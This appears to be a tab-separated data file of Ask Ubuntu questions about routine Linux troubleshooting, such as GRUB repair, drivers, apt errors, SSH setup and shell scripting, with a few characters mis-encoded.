18528	can i turn off window grouping with dockbarx ?	is there any way to turn off window grouping with dockbarx ? i use the prism app to create standalone windows for gmail , my corporate webmail , and a few other sites . because they all use prism , instead of displaying as separate shortcuts with the custom icons i assigned to each when creating them , they all display together under a single prism button , using the prism icon .
18531	error out of disk , grub rescue	i installed ubuntu via usb with no problems , but when i restart , i get an error message : error out of disk '' 'grub rescue . how can i fix this ?
18532	how to make google sketchup work with intel graphics in wine ?	my pc has an intel dh57jg mainboard , i 've installed wine , launching sketchup i receive error that i do n't have opengl installed , is there a way to configure/install it ? on my previous pc with an nvidia video card installing official nvidia driver resolved it . is there is a way to do the same with the intel card ? running locate libgl on a terminal returns no results . thanks in advance .
18537	how can i fix the login error ( p2p connect failed ) on skype ?	when i try to login it takes about 2 to 4 minutes and after that it shows an error that says : p2p connect failed . note that skype was working with me yesterday . thanks in advance
18538	when will natty narwhal 11.04 be stable to use ?	i have been wanting to try natty narwhal really bad . so about a week ago i tried it , and it was not at all stable . i know it 's still in development but i desperately want unity , i even reorganized my gnome panel with dockbarx and gnome window applets to try to emulate unity . i tried maverick early and it was great . : d ( getting a little off topic here ... . ) but anyways ; ) when is ubuntuîż natty narwhal 11.04 going to be ready for stable testing ?
18543	can i set a delay on startup sounds ?	is there a way to have the start up sound wait like i did in conky like this ? # ! /bin/bash sleep 30 not that its a big deal but my comp boots so fast it does not have time to play the small ogg file i have as the start up sound . or any other ideas on what i can do to get it to play ? ? also shutdown goes so fast it does not finish that sound either ? and as allways tyavmia : - )
18545	installing suggested/recommended packages ?	i ran the following code and got this package needs these packages , now it also says these packages are suggested , and theses are recommended . how do i get those up to install as well . myusuf3 @ purple : /etc $ sudo apt-get install virtualbox-4.0 reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : acroread ia32-libs lib32asound2 lib32bz2-1.0 lib32gcc1 lib32ncurses5 lib32stdc++6 lib32v4l-0 lib32z1 libaudio2 libc6-i386 libcurl3 libflac8 libhal1 liblcms1 libmng1 libogg0 libpulse0 libqt4-dbus libqt4-network libqt4-opengl libqt4-xml libqtcore4 libqtgui4 libsdl-ttf2.0-0 libsdl1.2debian libsdl1.2debian-alsa libsndfile1 libv4l-0 libvorbis0a libvorbisenc2 libx11-xcb1 nspluginwrapper suggested packages : libldap2 libgnome-speech7 lib32asound2-plugins nas liblcms-utils pulseaudio qt4-qtconfig recommended packages : pdf-viewer the following new packages will be installed : acroread ia32-libs lib32asound2 lib32bz2-1.0 lib32gcc1 lib32ncurses5 lib32stdc++6 lib32v4l-0 lib32z1 libaudio2 libc6-i386 libcurl3 libflac8 libhal1 liblcms1 libmng1 libogg0 libpulse0 libqt4-dbus libqt4-network libqt4-opengl libqt4-xml libqtcore4 libqtgui4 libsdl-ttf2.0-0 libsdl1.2debian libsdl1.2debian-alsa libsndfile1 libv4l-0 libvorbis0a libvorbisenc2 libx11-xcb1 nspluginwrapper virtualbox-4.0 0 upgraded , 34 newly installed , 0 to remove and 26 not upgraded . need to get 168mb of archives . after this operation , 460mb of additional disk space will be used . please and thank you
18546	why does badsig/gpg error keep appearing again and again ?	i 'm most frustrated at not being able to get rid of the badsig/gpg errors i get while running apt-get update . this is what i get when running the command : http : //paste.ubuntu.com/546690/ i tried cleaning the cache , changing the server to main server , and even tried the following command : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys < key > none of that seems to solve my problem though . help on this would be highly appreciated .
18547	built-in microphone not detected ?	my built-in microphone does n't seem to be detected , because i can not use it to record my voice in audacity and it 's also not working in skype . any solution for my problem ? laptop : axioo mnc
18557	what will be the default set of package management tools in future versions of ubuntu ?	with the introduction of ubuntu software centre , i remember reading , though i ca n't find any reliable source right now , that the various package managers were going to eventually be deprecated . indeed , gdebi is no longer a part of the default installation , and i heard that synaptic was scheduled to the removed in the near future . but what about the command line tools ? these are far more efficient than the ubuntu software center if you know what package name you 're after . will they continue to exist as standalone apps , or will they be rolled into ubuntu software center in some way , becoming it 's command line interface ?
18560	how to avoid problems when installing ubuntu and windows 7 in dual-boot ?	i want to try out ubuntu ( and hopefully choose it as my primary os ) . after looking at many versions of it in virtualbox and from live cd , i 've finally decided to install it . so i defragmented and shrinked one of the partitions to make room for ubuntu . my current setup ( after shrinking the d : partition ) : [ ·100 mb· ] [ ······250000 mb······ ] [ ·······600000 mb······· ] [ ··100000 mb··· ] reserved windows 7 system ( c : ) data ( d : ) free space ntfs ntfs ntfs ( for ubuntu ) the internet ( including askubuntu ) is full of scary stories about windows not loading after installation of ubuntu , something about installing grub to a wrong partition , etc . as i am a newbie to linux and ubuntu , it is very easy for me to do something wrong . please mention the problems that may appear and explain how to avoid them . ubuntu version that will be installed : 10.10 desktop amd64 please note that i have installed windows 7 about a year ago , so i have much to lose if something goes wrong . i want to be very careful because there is no way for me to backup all the data .
18564	is my filesystem corrupt or something ?	ok , so for the past 2 days my ubuntu install ( 10.10 ) has been acting in a very strange manner . just after the login process is done , and the desktop is loading everything seems to be fine , it is fast and smooth like always , but then some 5 mins . later , it gets all choppy and slow , the mouse pointer it 's slow , the apps wo n't respond to anything , and every aspect of the system is slow , even turning it off it 's slow . some 2 days ago , i asked a question here , about ubuntu giving me an error , the person who answer my question , said that the filesystem might be corrupt and told me to do a check with a live cd , and so i did , i ran the fsck command and it actually fixed something . however , this problem , the sluggish performance just wo n't go away , i do n't have any idea as to why this happened , but i 'd like to know if there is a permanent fix , or if im gon na have to install ubuntu all over again .
18566	how do i restore grub after windows has deleted it	so i had a dual boot , with windows , and ubuntu , but i had to re-install windows for various reasons ... now that i have re-installed windows , windows wrote over grub , which i knew was going to happen , but i did n't think about how to fix the problem , or if it was even possible ... so here is my question , how do i restore grub to allow me to boot into windows and my already installed ubuntu ?
18575	laptop freezes on boot , not sure where to start	i have an ubuntu laptop that stops responding when booting up . it will change between consoles with ctrl-alt-fn but pressing enter in the console would not even enter a blank line . the last printed line when booting up in recovery mode was `` skipping edid probe due to cached edid '' . any ideas what might be wrong ? pressing ctrl-alt-del successfully rebooted it when in that mode . another symptom is that grub stopped booting automatically , not sure if related ( i doubt it ) .
18576	vostro 3400 touchpad multiple gesture and two finger scrolling not working	i recently bought a dell vostro 3400 i3 with 4 gb ram . everything works smooth as silk and i am using maverick but i ca n't get two finger scrolling and multiple gestures such as zoom etc which it says it supports . can anyone help ? i have installed gsynaptics and enabled scrolling yet it doesnot work .
18587	is there any known problems with pci-e based ssd disks ?	i 'm going to add ssd disk to my ubuntu computer . is there any known problems with pci-e based ssd disks in ubuntu ( this , for instance ) ? or should i prefer ssd disk with sata interface to achieve maximum compatibility with ubuntu os ? i use ubuntu server 8.04 now , but i 'm ready to upgrade to 10.10 if necessary .
18592	get root privileges for nautilus on sftp connection	i use `` connect to server '' option to sftp to remote computers , as a user which has sudoer privileges . but then , i can not get root privileges to modify system files . how can i do this ? ( i know i can use ssh and then use sudo , but i was wondering if there 's a quicker method . )
18593	which kernel to use for server vm running on esx	we run several ubuntu virtual machines on esx server . in ubuntu , there are various kernels available : linux-generic-pae linux-generic linux-server linux-virtual which one is the best choise for a virtual machine running on esx ?
18594	utility/sniffer to track internet traffic/speed of all pcs in local network	it does n't matter if utility is for ubuntu or for windows xp/7 , just need to see what pc is using the most traffic in local network . probably some spammer etc on that pc . need to get rid of that , before calling to my isp .
18596	how do i make my intous 4 wacom affect only one monitor ?	i have two monitors and i want my wacom to only work on one monitor .
18599	dialing into multiple ppp connections	i have multiple 3g usb based modems . i would like them to keep connected simultaneously , not necessarily aggregating their bandwidth ; a separate intelligent application would manage their utilization effectively . however i am running into problem of setting up proper routes for the ppp0 , ppp1 interfaces : when one of them connects , other 's entries in the routing table get updated so it is no more usable . if i reconnect the second one , it would override the first one 's routing entries . if i do it over and over , sometimes both of them 's entries disappear while in rare cases the two work well . i have tried it both using networkmanager as well as wvdial but issue pops up in both of these . perhaps both of them use same ppp dialer at the backend and thats why this issue appears . what is the proper solution to make them work together ? in the long run , i 'd also like them to automatically dial in once usb gets connected .
18601	ca n't drag/drop applications to a different desktop	this has been bugging me for a while , and i ca n't find any preference settings that are affecting it , but : on one install of ubuntu/gnome i 've been able to drag applications in the bottom panel across to one of the virtual desktops and it would move there . however , with the install i 'm using on a different computer , it is refusing to do this , and all i can do is right-click and select the desktop . this has happened on a number of versions of gnome ( from 9.04 through to 10.10 ) with one computer having this function , and the other computer not . i 've also done a couple of complete rebuilds - so it does n't appear to be a preference/option being stuck somewhere . anyone have any clue how to get this functionality enabled ?
18602	malware scanner for ubuntu	what 's a good malware scanner for ubuntu ? -- update i just suspect something strange on my system , so i wondered if is there a malware scanner .
18603	how to stop gnome-power-manager from changing the global backlight setting ?	after installing ubuntu on my thinkpad t510 , the gdm screen and gnome session would always start at 100 % brightness . i quickly found out , that this can be controlled via gnome-power-preferences , but i 'd like to have gdm and the gnome session follow the global backlight setting ( ie. , when i set it during post , grub , gdm , a gnome session , or on a tty , i expect it not to automatically change ) . so , how can i make gnome-power-manager stop automatically changing my backlight level ?
18606	ubuntu netbook installation fails on allocate drive space screen , no root file system is defined	i 'm trying to install ubuntu netbook on my mum 's windows xp atom notebook . the notebook does n't have an optical drive , nor do we currently have a usb drive in the house . so i decided to use unetbootin to create the `` frugal '' hard disk loader . the only thing is , now i 'm stuck on the allocate drive space screen during ubuntu install . the screen i 'm stuck on looks like this : sorry it 's so blurry . anyway , the two entries in the table start with `` /dev/ '' . regardless of which one i choose i get an error saying : > no root file system is defined bear with me , because i do n't know anything about partitions or stuff like that . i chose ubuntu because it 's user-friendly and because windows is a pile of crap , particularly xp on a netbook . having said that , what 's gone wrong , can you help ? also , after choosing unebootin from the boot options and it starts to load ubuntu , it gives the option to press `` esc '' to load options . the screen that comes up looks like this : now , out of those options , i 've tried the first one , which says unetbootin again , and the straight up `` install ubuntu netbook '' options , but have come up against exactly the same issue both times . any ideas anyone ?
18615	program menu disappeared	my problem is as follows : the program menu , the one that has file edit view all that does not display in some programs like audicity play on linux when i change the theme in the appearance it appears again i really do not know what is wrong with that or why . i have ubuntu 10.10 and running compiz have ubuntu tweak thanks for all that will answer and all that can not really thanks dudes . ubuntu is sure fun
18618	can not open output file test : is a directory collect2 : ld returned 1 exit status	i want to compile the program using these command : gcc -o test test.c , then it displays these : yangbin @ yangbin-desktop : ~/ćąé˘ $ gcc -o test test.c /usr/bin/ld : can not open output file test : is a directory collect2 : ld returned 1 exit status i can not understand why , please give me a hand to solve it ! i am a freshman . /*****test.c*********/ # include int main ( void ) { int input=0 ; printf ( `` enter an integer : '' ) ; scanf ( `` % d '' , & input ) ; printf ( `` twice the number you supplied is % d\n '' ,2*input ) ; return 0 ; }
18622	what piece of the last update could break keyboard switcher , systray , clipboard and adobe flash in xubuntu 11.04 ?	i was succesfully using xubuntu 11.04 for some days , but after today update ( i have n't updated during the last 2 days ) lots of things stopped working : adobe flash firefox plugin , clipboard , notification area panel applet , keyboard layout switcher panel applet , sound volume panel applet , cpu meter panel applet . lack of clipboard really annoys . what could be the reason ? is there a a way to fix this ?
18626	can i let maximized windows reach behind the gnome-panel ?	my top gnome-panel is set to not expand and sits on the top-right of my screen . i just realized i would n't mind if maximized windows were able to get behind it ( it would n't actually cover up anything ) . is it possible to achieve that with the gnome-panel ? here 's what it looks like now : ideally , the window 's titlebar would be behind the panel ( partially obscured by it ) . i know that different dock softwares like awn are able to do that , but i 'm running a weak netbook , and i would rather do that with the gnome-panel .
18629	my appearance theme briefly changes itself	recently my gnome interface theme has occasionally changed itself on every few logins . on the times it does change as soon as i login i get a completely different theme set on my menu bar , icons , font , everything . it sets the grey accessibility one ( i think ) but then after a few moments it changes itself back to the correct theme set in the appearance menu . however one after effect of this issue is that nautilus become messed up . ( screenshot attached below : ) this is the theme that gets randomly applied before changing back to my normal theme , but it sticks with nautilus , unless i kill it and restart it . i do n't know what i could of done to make this happen and it only started happening a few days ago . any help on this issue would be great ! it 's got me baffled ! useful info about my theme setup : using nautilus elementary faenza icon set using ambiance for menus and windows . compiz enabled nvidia graphics card
18631	how to downgrade gtk+2.0 package to workaround bug # 693758 ?	as it seems that i 've been hit by the bug # 693758 i am willing to downgrade gtk+.2.0 from 2.23.3 to 2.23.2 . but it seems that i have no package with such a name in my system : - ( how do i downgrade it then ?
18632	update manager stuck in update	the update manager is still stuck in updating the linux kernel ( linux-image-2.6.35-24-generic ) in the process of updating the grub entries . i think the problem is that the update manager does n't have root privileges to continue ( the app indicator with the key icon disappeared ) and i want to know if it 's safe to kill the update manager and start the process over .
18636	firestarter and dhcp failing via wireless	i recently installed firestarter to implement a firewall for my server - an ubuntu 10.04 installation . now , when ever a wireless connection attempts to connect and get an ip address via dhcp , it fails with a request timeout . from the log it appears to be communicating with the wireless hub and on the server i 'm getting the following : unknown inputin=eth1 out= mac=ff : ff : ff : ff : ff : ff : xx : xx : xx : xx : xx : xx : xx : xx src=0.0.0.0 dst=255.255.255.255 len=328 tos=0x10 prec=0x00 ttl=128 id=0 proto=udp spt=68 dpt=67 len=308 this did used to work . anyone any idea what 's up and how to fix it ? as an additional point , the dhcp works fine with wired connections and does n't log the above message . edit : samba domains/share have stopped working on the wired lan - they did work at one point , but they do n't anymore . i might have to experiment with the various rules to see what happens .
18637	encrypting an extra partition with ecryptfs ?	i have an extra ext4 formatted partition which i would like to ecrypt with ecryptfs . i have chosen not to go for home directory ecryption and having a encrypted private directory also has n't helped me . so , the remaining option for me is to encrypt the extra partition . so , i want to know what is the best way to achieve this . the drive should get mounted when i log in . and i should be able to move my documents and other important folders in the home directory to the encrypted drive , and symlink them back to the home directory . as i save some passwords in firefox , should i move the hidden firefox folder in the home directory to the encrypted drive ?
18640	how can i get rid off this slight red border in progress-gui ?	perhaps someone can help me to get rid of this slight red border in the progress-gui ? see the attached screenshot . i 'm using the finery theme , i found the gtkrc file in my themes folder but does n't find where to change the color of this border or an possibility to change the borderwidth to zero ?
18641	there 's an issue with an alpha/beta release of ubuntu , what should i do ?	i 've been running alpha releases of ubuntu for some time now . i keep running into issues - how can i get these resolved ? what should i do when i encounter these problems ? and where can i find other ubuntu+1 users to ask questions ?
18643	configuring squid3 with tor	in this guide there are instructions for configuring privyproxy with tor , but not for squid or squid3 . so , how squid3 conf file should be modified to make it work with tor ?
18654	how to prevent updating of a specific package ?	because of bug # 693758 i 'd like to prevent apt-get upgrade and update manager from updating the `` libgtk2.0-0 '' package . how can this be achieved ?
18658	how do i get the skype panel icon back ?	i m a less that 10 hours user of ubuntu 10.10. i have installed skype.the first time i installed it there was a green icon on the panel with my status but i closed it by wrong.any idea how to return it ? thanks
18665	lenovo thinkpad t400 and docking station	developer in me woke up this morning and asked me to fix this before christmas . ( as his christmas gift ) . so , if i power on the laptop after docking it , everything works fine . but if i am working on it standalone and then try to dock it , i can not get the display . same way , if i undock it while working , i loose the display . basically , i need to reboot for any docking/undocking dance to work . questions : 1 ) what kind of information should i be looking for to understand the problem ? 2 ) where to find that information . after this , i can go and try to figure out what is going wrong .
18668	how to install the greasemonkey in google chrome / opera / midori ?	anyidea how to install its on its ? in google chrome / opera / midori ?
18673	problems trying to move my /home partition	i was running low in disk space on my linux box , ubuntu 10.10 desktop , ( specifically on my /home partition ) so i added another disk to it and i am trying to move the home partition into it . i am trying to follow the steps on this guide here : https : //help.ubuntu.com/community/partitioning/home/moving however , when copying the files over to the new mounted partition rsync seems to fail silently . when i compare the folders , the new one is still empty . this is the command that i am executing : sudo rsync -axs -- exclude='/*/.gvfs ' /home/ . /media/home/ . has it anything to do with the encryption on my home folder ?
18675	no graphics after installing nvidia driver	i installed nvidia driver , rebooted , and got no graphics , only console . suggestions ? thanks .
18683	puppy linux 5 lupu iconsets for ubuntu ?	i like the puppy lupu desktop icons . are they available as a separate iconset to use in ubuntu ?
18684	bookmarks in places menu now open in firefox instead of nautilus	fresh install 10.10 all my bookmarks mainly ftp and ssh bookmarks open firefox and show a web based file browser instead of spawning a nautilus window . have no idea what caused this never seen this before . this kills me on this machine to not be able to transfer/edit remote files right from my places menu .
18685	adding pages to existing pdf file	i have a pdf document with over 300 pages . i need to add 15 pages in between - after page 180 . how can i do it ?
18688	for what duration is sudo_root in `` don't-prompt-for-password '' mode ?	the first time a user enters sudo foo , sudo_root prompts for the password . for a certain duration after that , sudo_root does n't prompt for a password for any subsequent sudo foo 's in that terminal session . what duration is that ? can the duration be changed ?
18690	pipe error with bash script called from python	i 'm trying to run a shell script inside some python code , but i keep getting an error message . python script ( test.py ) : import os f = os.popen ( '/home/test/downloads/record.sh ' ) f.close ( ) shell script ( record.sh ) : # ! /bin/sh rec -r 16k -c 1 -p | sox -p output.wav silence 1 0.1 1 % -1 0.5 1 % & when i run : python test.py this is the error message that i get : fail sox : `- ' error writing output file : broken pipe running the shell script alone works fine ( i.e . ./record.sh ) . what am i doing wrong ? thanks . edit below : i have changed the shell script , so it looks like this ( there is no longer any piping ) : # ! /bin/sh rec -r 16k -b 16 -c 1 output.wav silence 1 0.5 0.1 % 1 1.0 0.1 % with stefano 's help i have the following python script : # ! /usr/bin/python from subprocess import popen , pipe output = popen ( [ `` sh '' , `` /home/test/downloads/data/recorder.sh '' , ] , stdout=pipe ) .communicate ( ) [ 0 ] do i still need the pipe and communicate bits ? what do i need to change , so that the python script does n't wait for recorder.sh to finish before moving on ?
18697	since that last kernel upgrade x uses too much ram	ok so i guess last few days there was a kernel upgrade in apt , cause i had to reboot . and since then , x shows up in htop eating 50 % or more of my ram ! and the swap is totally eaten too . i have n't seen that happen in years . using 10.10 w/ compiz and an nvidia 6150 with the official nvidia drivers . this has made my computer unusable . i disable awn and changed my theme and no effect on x ram usage . i tried looking with the 'tree ' mode in htop for anything that stood out but did n't see anything . help , cause now i have to boot up into vista .
18698	printing a poster ( over several sheets of paper )	i have a poster i would like to print . it is far larger than a single sheet of paper that can fit in my printer . what is a program that i can use to print it out on separate sheets of paper ( to assemble later ) ?
18702	how to make videos seekable with ffmpeg / mencoder	i 'm using mencoder and ffmpeg to make videos with music playing over a single image . the videos play fine but i ca n't seek at all . i 've tried generating them with -idx and even -forceidx and keyint with mencoder but i could n't get it to work . the only option i saw for this with ffmpeg was force_key_frames but it seems i 'd have to set each time explicitly . i 'd specifically like this to work with totem . when i do try to seek with totem it restarts the video . i can seek with other videos processed with mencoder/ffmpeg where i started with a video from another source . i 'm only having trouble with these videos that i 'm creating from images . the basic encoding commands i 'm using are : mencoder `` mf : //image.jpg '' -mf w=480 : h=360 : type=jpg -o mencoder_out.avi -ovc lavc -lavcopts vcodec=mpeg4 : aspect=4/3 : keyint=30 -audiofile music.mp3 -oac copy -fps 1/300.0 -ofps 30 -idx and ffmpeg -i image.jpg -i music.mp3 -acodec copy ffmpeg_out.avi with mencoder i 've also tried using a separate pass to add the key frames : mencoder -idx mencoder_out.avi -o mencoder_indexed.avi -ovc copy -oac copy note : with mencoder i usually add other lavcopts like vbitrate and mbd but none of those have had any effect on this problem as far as i can tell
18704	can i use apt-get or aptitude to install software to non standard location ?	when i install a software using apt-get it installs to default locations i.e to /usr/bin , /usr/lib , /usr/share and etc . for example when i install `` meld diff viewer '' using sudo apt-get install meld and use whereis command to find its location , i get the following output adnan @ adnan-laptop : ~ $ whereis meld meld : /usr/bin/meld /usr/lib/meld /usr/share/meld /usr/share/man/man1/meld.1.gz is there any way to change the install location . lets say if i want to install it in /usr/local/ can i do it using apt-get or aptitude ? i know i can compile it from source and specify prefix option to configure script or make install but it would be better ( and really easier ) if i could do it using apt-get as i would be able to use uninstall , upgrade and other stuff that apt-get offers
18706	monitoring of network	we have around 300 machines , how to monitor the network using ubuntu machine so that we can find out which node is broadcasting , traffic monitoring , also trying ntop kindly advise happy x-mas to all and especially to ubuntu team and community
18713	how can i keep a command started from shell on running if i logout from shell ?	which methods exist to keep a command that was started from shell on running after logging out from from shell ?
18716	how to load a `zenity` list dialog with space-embedded data from `ls` ?	i 'm having problems loading a zenity list dialog when the data contains spaces . it is straight-forward when there are no spaces in the listed data , but i do n't know of a simple/standard method for space-embedded file names . for some reason , the output of $ ( ls -q /tmp ) ( quoted output ) still splits the file-names at every space . the quotes and back-slashes in the ls | sed output seem to be treated as a `` finalized string '' rather than as `` readable data lines '' ( like the first two data lines ) ... i 've managed to `` work around the issue '' , but self-modifying code probably is n't the best way to go ! ( even though it is fun ! : ) here is the method which does not work zenlist= '' /tmp/zen list '' ; touch `` $ zenlist '' zenity -- list -- title='a single-column list ' -- width=600 -- height=450 \ -- column='spaces are allowed within `` q u o t e s '' ' \ '' how much wood would a woodchuck chuck , '' \ '' if a wooodchuck could chuck wood ? '' \ $ ( ls -q -1 `` $ zenlist '' * |sed 's/ $ / \\/ ' ) echo `` '' # rm `` $ zenlist '' # uncomment this line to delete the file this method works , but there must be a `` conventional '' ( better ) way ! ? zenlist= '' /tmp/zen list '' echo `` zenity -- list -- title='a single-column list ' -- width=600 -- height=450 \\ '' > '' $ zenlist '' echo `` -- column='spaces are allowed within \ '' q u o t e s\ '' ' \\ '' > > '' $ zenlist '' echo `` \ '' how much wood would a woodchuck chuck , \ '' \\ '' > > '' $ zenlist '' echo `` \ '' if a wooodchuck could chuck wood ? \ '' \\ '' > > '' $ zenlist '' ( ls -q `` $ zenlist '' * |sed 's/ $ / \\/ ' ) > > '' $ zenlist '' echo `` '' > > '' $ zenlist '' source `` $ zenlist '' # rm `` $ zenlist '' # uncomment this line to delete the file
18717	eee900 keyboard issues	my girlfriend has an asus eee900 ( the version with the 2 ssds ) . although it ships with xandros , one of the first things i did for her was remove it and install ubuntu . she 's had ubuntu netbook remix on there for a while , but once unity was enforced on everyone , the poor little netbook ca n't cope with it ( the graphics performance is pretty hopeless ) . after swapping and changing a few times to get something she likes , i 've installed linux mint 9 . unfortunately , the keyboard is n't mapped correctly and i ca n't find the correct driver to use for it . this means that some of the keys only work with the left shift key , some others only with the right shift key , and some others work with neither . in particular , she ca n't type an @ sign - which makes emailing people difficult ! any advice on how i can get the keyboard operating again would be very much appreciated by both of us !
18718	hindi keyboard layout is missing combined characters	i am trying to set up a school computer lab with hindi typing capabilities and am having trouble getting ubuntu 10.04 to type all of the hindi combined characters . i 'm using `` bolnagri '' since it is very intuitive for people who know the english keyboard . there is a layout document in the link which shows many combined characters but there are a few characters like ऋ which do not have any third level key code mentioned . i found ॠ with character map at u0960 in the hindi font but when i type in ऋ i get ॠ . another problem is that श्र ( zxr ) does not work . it does not combine into the character shown but is a half श + र. i must be doing something wrong so am hoping someone can help .
18721	subtitle are not working in vlc	i had installed vlc 1.1.4 in ubuntu 10.04 via a ppa . after i installed it , i have not been able to view subtitles after loading it . it appears as a rectangle in place of text . how can i fix this ?
18723	atheros wireless not working	i have been struggling hard since i have installed ubuntu 10.10 but it has been difficult for me to get my wifi working . so here is what i tried . first i checked whether i have the driver using the ifconfig command and it shows the wireless lan driver as wlan0 . next , i tried the command iwlist wlan0 scanning by becoming the root which gave me the output as no scan results . next , i visited this link https : //help.ubuntu.com/community/wifidocs/driver/atheros to see as to what problem my laptop may have . i do own have an ath5k chipset . and as i followed the instructions in the above link in one of the blacklist-ath_pci.conf file had this written in it . for some atheros 5k rf macs , the madwifi driver loads buts fails to correctly initialize the hardware , leaving it in a state from which ath5k can not recover . to prevent this condition , stop madwifi from loading by default . use jockey to select one driver or the other . ( ubuntu : # 315056 , # 323830 i am not that good at linux but i have given it a try . i am desperate to have my wifi working and i would be glad if this community could help . added : if anyone would like to know as to what drivers i am using this is the output . network description : wireless interface product : ar2413 802.11bg nic vendor : atheros communications inc. physical id : 3 bus info : pci @ 0000:0a:03.0 logical name : wlan0 version : 01 serial : 00:19:7d : d3:0c : fd width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath5k driverversion=2.6.35-24-generic firmware=n/a latency=168 link=no maxlatency=28 mingnt=10 multicast=yes wireless=ieee 802.11bg resources : irq:18 memory : d0000000-d000ffff some more information and output as to what i have done . lsmod | grep ath ath5k 130083 0 mac80211 231541 1 ath5k ath 8153 1 ath5k cfg80211 144470 3 ath5k , mac80211 , ath led_class 2633 1 ath5k
18724	unable to mount audio disc	when i insert an audio disc , i get this message : unable to mount audio disc location is not mountable i use ubuntu 10.10 what can i do to fix this ? thanks .
18736	sound card restriction	is it possible to make certain processes to not have access to my sound card ? let 's say i have 2 processes running : firefox and my music player and i want to make sure only my music player can produce sound.. i imagine there must be some sort of request from the application to the sound card to `` acces the sound card '' ( perhaps via drivers ? ) , so i could basically redirect all requests that do n't come from my music player to /dev/null ( i 'm in ubuntu ) . perhaps this is possible with some shell script or c script ?
18739	how can place firefoxâs tab close buttons on the left ?	i would like to make firefox fit more to the ubuntu default themes ambiance and radiance . therefore i would like to place the tab close buttons on the left instead of the right of each tab . i found this tutorial , but it seems to be only for firefox 4 . is there any way of doing that for firefox 3.6 ?
18740	canonical support for linux-headers package	i 'm running ubuntu 10.04 . a search for `` linux-headers '' in synaptic package manager , and selecting the package `` linux-headers-2.6.32-26-generic '' displays the following notes for this package : `` canonical provides critical updates for linux-headers-2.6.32-26-generic until october 2011 . '' now , selecting `` linux-headers-2.6.32-21-generic '' displays the following notes : `` canonical provides critical updates for linux-headers-2.6.32-21-generic until april 2015 . '' note that the earlier version ( linux-headers-2.6.32-21-generic ) is supported till 2015 , while the later version ( linux-headers-2.6.32-26-generic ) is only supported till 2011 . why is this the case ? should n't a later version be supported till a later time ?
18742	ca n't change capslock setting , always resets itself back to `` disabled ''	so i disabled capslock a while ago when i finally upgraded to 10.04 ( via system ➜ preferences ➜keyboard ➜ layout ➜ options ) . now , i simply want to set it to make capslock an additional esc . but ubuntu seems to hate capslock so much , that , as soon as i close the dialog , it resets it to disabled . my best guess is , that it ca n't write the setting due to some ownership issues , but i could n't figure out where the setting is actually stored .
18747	how do i install .run files ?	my pc has both ubuntu and windows 7 installed . i have installed all my drivers in windows like nvidia graphics , motherboard etc . shall i install them in ubuntu too ? i looked on the web for my nvidia drivers and i have found a .run file . how could i install it on my ubuntu ?
18751	how to encrypt external hard drive to be readable on any os ?	i want to encrypt my new external hard drive so it would be readable/writable on any computer i plug it in . can i do that ?
18754	ubuntu version for browsing pages on low-end netbook	i have aao110 ( 512ram , atom 270n ) what is best version of ubuntu , if i need just web ? unr 10.04 was almost fine , but i wonder if there are better options now . browser , blue-tooth , wifi , long battery , no extra elements on screen ( e.g . not like in unity ) while browser opened
18758	shared folders in virtualbox	i have a win7 box with an ubuntu 10.10 vm accessed in virtualbox . the ubuntu install has the ex4 filesystem . can i access the shared folders in both windows and ubuntu without corrupting the data ? i made this mistake when dual-booting my laptop and made changes to a folder in ubuntu . when i tried accessing that data in windows , the access time was very slow , basically about 10 % of normal . the only way i could fix it was to restore the data from backups and not make changes in ubuntu . if i do this with the shared folders , will the same thing happen ?
18763	install 10.10 netbook edition on eee pc [ 1015 ] using a usb hdd	i got brand new eee pc as a christmas present and wanted to immediately install ubuntu on it . for that i downloaded the netbook edition and set-up my usb hard disc ( note : hdd not flash drive ) according to the guide on the official download website . then i set-up the boot priority to `` removable devices '' as first priority . if i boot now , however , the hdd is not booted . is it not possible to do it that way ?
18771	setting up ubuntu one address book	i deleted the ubuntu one address book from evolution , but now want to use it . suddenly realized what brilliant service i lost : ) how to set up ubuntu one address book again ? could n't find the details that i need to enter , like the type service , or server url . i set up everything else : ubuntu one account , the ubuntu one program on my pc , so just need to make my contact sync .
18775	how to remove or hide the grub boot menu ?	recently i decided to use only ubuntu and there is no windows in my laptop . when i turn on my laptop the grub menu is showing but i do n't need to choose os anymore . how can i remove or hide this ? and after removing this how could i access to recovery mode ?
18778	freebsd bootable cd/usb from ubuntu	how to create bootable cd or usb ( preferably ) from ubuntu ? i tried freebsd-8.1-release-i386-memstick.img from freebsd.org with ubuntu service : startup disk creator - but it fails saying : `` installation failed '' . any help would be appreciated . thanks .
18782	conky forecast f c output	temp : $ { execi 3600 conkyforecast -- location=01104 -- imperial datatype=ht } this what i have and it shows the right temp but it says 25째 af . any help or hints appreciated and as allways tyavmia
18783	ca n't connect to desktop via ssh	trying to setup a remote ssh file server ( sftp ) i 've done it before but for some reason with ubuntu 10.10 i can not connect to the assigned ssh port . i setup the sshd_config file to listen on a specific port that did n't work so i changed back to the default :22 then i reinstalled because i could n't get my samba shares to work either.. so from scratch i changed the port again and i did n't setup a private key file i just tried to connect via ssh over the local network ssh username @ 192.168.2.1:22 ssh : could not resolve hostname 192.168.2.1:22 : name or service not known every time no matter what i do i get that message if it 's the wrong port it just says connection refused is there some weird ip rule that is setup in mav meerkat ? i 've done this plenty of times and have been using linux since ubuntu 8.10 so i am not new to this please help ! !
